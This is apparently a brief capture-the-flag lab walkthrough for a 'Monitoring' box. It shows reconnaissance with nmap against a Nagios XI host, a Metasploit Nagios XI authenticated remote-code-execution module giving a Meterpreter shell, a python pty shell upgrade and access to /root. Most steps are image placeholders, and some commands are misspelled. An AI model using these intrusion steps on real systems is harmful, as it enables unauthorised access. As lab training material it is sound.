root@blog:~#

View on GitHub

Monitoring

RECON


Ip Search
Investigating the IP shows Nagios XI
image1 Login Page image4

Nmap Scan

nmap -sC -sV -A 192.168.54.136 

-safe scripts -service version -OS /version detection
image3

Exploit Search

msfconsole 
search nagios 

image7

Service Version
Provided Exploits did not work but reveals the service version
image6

Google-Fu

Nagios XI Remote Code Execution

Exploit allows for root access prior to 5.6.6 image9
image11

ENUMURATION

Exploit

use exploit /linux/http/nagios_xi_autheticated_rce

Reveales it had been moved
image8

Set Options and Run
Provides Meterpreter Shell
image5

Privilege/Root Escalation

Switch to TTY Shell

shell
python -c ‘import pty;pty.spawn(“/bin/bash”)’

image10
Root Flag

cd /root

image2